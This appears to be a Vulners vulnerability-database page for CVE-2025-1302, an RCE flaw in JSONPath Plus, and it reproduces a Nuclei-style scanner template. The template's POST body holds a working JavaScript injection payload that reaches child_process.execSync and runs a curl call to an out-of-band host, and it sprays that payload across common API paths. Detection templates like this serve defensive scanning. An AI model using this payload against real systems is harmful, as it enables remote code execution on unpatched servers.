Vulners
Lucene search
JSONPath Plus < 10.3.0 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 79 |
|---|---|---|---|---|
 | Exploit for Code Injection in Symfony Twig | 3 Jan 202620:15 | – | githubexploit |
| Exploit for CVE-2024-21534 | 13 Nov 202407:56 | – | githubexploit |
| Exploit for CVE-2025-1302 | 25 Feb 202508:36 | – | githubexploit |
| Exploit for CVE-2024-21534 | 28 Nov 202417:47 | – | githubexploit |
| Exploit for CVE-2025-1302 | 27 Feb 202604:05 | – | githubexploit |
| Exploit for CVE-2025-1302 | 24 Jul 202517:45 | – | githubexploit |
| Exploit for CVE-2024-21534 | 23 Nov 202405:54 | – | githubexploit |
 | Security Bulletin: Multiple Vulnerabilities in IBM API Connect | 15 Mar 202500:18 | – | ibm |
| Security Bulletin: Vulnerability in jsonpath-plus affects IBM watsonx Assistant Cartridge and IBM watsonx Orchestrate with watsonx Assistant Cartridge. | 21 May 202514:58 | – | ibm |
| Security Bulletin: Multiple Security vulnerabilities affecting IBM Knowledge Catalog Premium Cartridge | 11 Mar 202619:05 | – | ibm |
10
id: CVE-2025-1302
info:
name: JSONPath Plus < 10.3.0 - Remote Code Execution
author: Jaenact
severity: critical
description: |
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534]
impact: |
Attackers can execute arbitrary code on the system, potentially leading to full system compromise.
remediation: |
Update to version 10.3.0 or later.
reference:
- https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-8719585
- https://github.com/JSONPath-Plus/JSONPath
- https://github.com/EQSTLab/CVE-2025-1302
- https://nvd.nist.gov/vuln/detail/CVE-2025-1302
- https://gist.github.com/nickcopi/11ba3cb4fdee6f89e02e6afae8db6456
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-1302
cwe-id: CWE-94
epss-score: 0.10701
epss-percentile: 0.95258
metadata:
verified: true
max-request: 1
tags: cve,cve2025,rce,jsonpath,vkev
http:
- method: POST
path:
- "{{BaseURL}}/query"
- "{{BaseURL}}/jsonpath"
- "{{BaseURL}}/api/query"
- "{{BaseURL}}/data"
- "{{BaseURL}}/parse"
- "{{BaseURL}}/filter"
- "{{BaseURL}}/expression"
headers:
Content-Type: application/json
body: |
{
"path":
"$..[?(p=\"console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())\";Ethan=''[['constructor']][['constructor']](p);Ethan())]"
}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"result":'
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 490a0046304402203a3ac8b832a221472371af697275f30611c1957131b54a329a279f1ac10d073902204c7a52d593d86d4a39892d2ba4e7bed81a3d632aa3fde1dfe1a2a8b2a5a97b91:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
CVSS 49.3
EPSS0.10701
SSVC